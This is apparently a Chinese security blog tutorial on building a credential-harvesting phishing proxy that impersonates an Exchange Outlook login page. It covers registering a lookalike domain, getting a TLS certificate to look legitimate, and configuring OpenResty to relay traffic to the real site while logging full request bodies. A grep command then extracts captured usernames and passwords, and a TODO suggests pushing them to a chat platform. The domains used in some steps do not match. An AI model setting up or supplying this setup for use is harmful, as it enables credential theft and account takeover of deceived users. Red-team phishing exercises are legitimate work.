STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
具体步骤
说明:除了域名发生了变化其他不会影响该站点的任何功能,省去了克隆站点等其他繁琐的步骤。
场景: 伪装成目标 exchange outlook 登录,诱骗用户输入账号密码。
伪造相似域名:mail.exchange-`0`utlook.com
被仿冒域名:mail.exchange-outlook.com
购置域名 mail.exchange-`0`utlook.com 并A记录解析至服务器。
在该服务器部署安装certbot、openresty具体操作步骤如下。
更新源并安装可能需要的依赖。
apt-get update -y
apt-get install -y libpcre3-dev libssl-dev perl make build-essential curl zlib1g-dev
Ubuntu安装Certbot(根据版本选择如下命令进行安装)。
apt install certbot python3-certbot-nginx
apt install certbot python-certbot-nginx
使用Certbot配置免费ssl证书,增加可信度。
certbot --nginx -d mail.sfitshfe.com
运行后正常Certbot会自动检测nginx对应域名的配置文件路径并提示是否要全部转跳到https,选择1后配置完成,并且nginx会帮你重新加载配置文件,重新打开网站已经支持https访问了,因为是免费的证书,所以只有90天有效期。
certbot certificates # 可以查看证书的状态
certbot renow # 证书到期30天前可以自动更新
certbot revoke # 撤销证书
certbot delete # 撤销后删除证
查看证书的状态及路径。
[email protected]:/home/ubuntu# certbot certificates
Saving debug log to /var/log/letsencrypt/letsencrypt.log
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Found the following certs:
Certificate Name: mail.exchange-0utlook.com
Domains: mail.exchange-0utlook.com
Expiry Date: 2022-09-08 03:09:57+00:00 (VALID: 86 days)
Certificate Path: /etc/letsencrypt/live/mail.exchange-0utlook.com/fullchain.pem
Private Key Path: /etc/letsencrypt/live/mail.exchange-0utlook.com/privkey.pem
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Ububtu安装openresty [install_openresty.sh]
(https://gist.github.com/k8scat/0adca267c15ae9f3ed39770803e82ec3# file-install_openresty-sh)。
#!/bin/bash
set -e
rm -rf openresty-1.19.3.2 openresty-1.19.3.2.tar.gz
apt-get update -y
apt-get install -y libpcre3-dev \
libssl-dev \
perl \
make \
build-essential \
curl \
zlib1g-dev
curl -LO https://openresty.org/download/openresty-1.19.3.2.tar.gz
tar zxf openresty-1.19.3.2.tar.gz
cd openresty-1.19.3.2
./configure \
--with-http_gzip_static_module \
--with-http_v2_module \
--with-http_stub_status_module
make
make install
mkdir -p /usr/lib/systemd/system
cat > /tmp/openresty.service <<EOF
# Stop dance for OpenResty
# =========================
#
# ExecStop sends SIGSTOP (graceful stop) to OpenResty's nginx process.
# If, after 5s (--retry QUIT/5) nginx is still running, systemd takes control
# and sends SIGTERM (fast shutdown) to the main process.
# After another 5s (TimeoutStopSec=5), and if nginx is alive, systemd sends
# SIGKILL to all the remaining processes in the process group (KillMode=mixed).
#
# nginx signals reference doc:
# http://nginx.org/en/docs/control.html
#
[Unit]
Description=The OpenResty Application Platform
After=syslog.target network-online.target remote-fs.target nss-lookup.target
Wants=network-online.target
[Service]
Type=forking
PIDFile=/usr/local/openresty/nginx/logs/nginx.pid
ExecStartPre=/usr/local/openresty/nginx/sbin/nginx -t -q -g 'daemon on; master_process on;'
ExecStart=/usr/local/openresty/nginx/sbin/nginx -g 'daemon on; master_process on;'
ExecReload=/usr/local/openresty/nginx/sbin/nginx -g 'daemon on; master_process on;' -s reload
ExecStop=-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /usr/local/openresty/nginx/logs/nginx.pid
TimeoutStopSec=5
KillMode=mixed
[Install]
WantedBy=multi-user.target
EOF
# systemctl enable openresty
# systemctl start openresty
# systemctl status openresty
rm -rf openresty-1.19.3.2 openresty-1.19.3.2.tar.gz
```
创建或编辑配置文件/etc/openresty/nginx.conf(建议修改覆盖前备份默认配置文件)。
worker_processes 1;
#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;
#pid logs/nginx.pid;
events {
worker_connections 1024;
}
http {
include mime.types;
default_type application/octet-stream;
log_format logeverything '======\n$current_time - $remote_addr\n$request_headers\n\n$request_body\n=======\n';
keepalive_timeout 65;
server {
set $request_headers "";
set $current_time "";
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.htm index.nginx-debian.html;
server_name mail.exchange-0utlook.com; # managed by Certbot
listen [::]:443 ssl ipv6only=on; # managed by Certbot
listen 443 ssl; # managed by Certbot
ssl_certificate /etc/letsencrypt/live/mail.exchange-0utlook.com/fullchain.pem; # managed by Certbot
ssl_certificate_key /etc/letsencrypt/live/mail.exchange-0utlook.com/privkey.pem; # managed by Certbot
include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot
location / {
proxy_pass https://mail.exchange-outlook.com/;
proxy_set_header Host $host;
proxy_cookie_domain mail.exchange-outlook.com $host; # 此处被仿冒站点
proxy_set_header referer "https://mail.exchange-outlook.com$request_uri"; # 此处被仿冒站点
proxy_set_header User-Agent $http_user_agent;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header REMOTE-HOST $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_connect_timeout 300;
proxy_buffering off;
proxy_send_timeout 300;
}
access_log logs/cool.log logeverything; # http 数据结果文件
}
}
执行命令启动nginx并加载配置文件。
/usr/local/openresty/nginx/sbin/nginx -c /etc/openresty/nginx.conf
nginx启动:
/usr/local/openresty/nginx/sbin/nginx。
nginx关闭:
/usr/local/openresty/nginx/sbin/nginx -s stop。
nginx重新加载配置:
/usr/local/openresty/nginx/sbin/nginx -s reload。
访问两个站点效果:
访问https://mail.sfitshfe.com/ 并输入账号密码,查看保存的账号密码。
cat /usr/local/openresty/nginx/logs/cool.log | grep -oE 'username=(.*?)&password=(.*?)'
TODO:因为该项目比较仓促个人感觉需要做个文件监控脚本,并将特定字段(账号密码)自动推送到钉钉或其他平台。
参考
OpenResty 使用介绍:
https://www.runoob.com/w3cnote/openresty-intro.html
Certbot 1.28.0 documentation:
https://eff-certbot.readthedocs.io/en/stable/index.html
如何使用 Certbot 免费申请 https 证书:
https://www.zhihu.com/question/484431835/answer/2262502859
安恒信息
✦
杭州亚运会网络安全服务官方合作伙伴
成都大运会网络信息安全类官方赞助商
武汉军运会、北京一带一路峰会
青岛上合峰会、上海进博会
厦门金砖峰会、G20杭州峰会
支撑单位北京奥运会等近百场国家级
重大活动网络安保支撑单位
END
长按识别二维码关注我们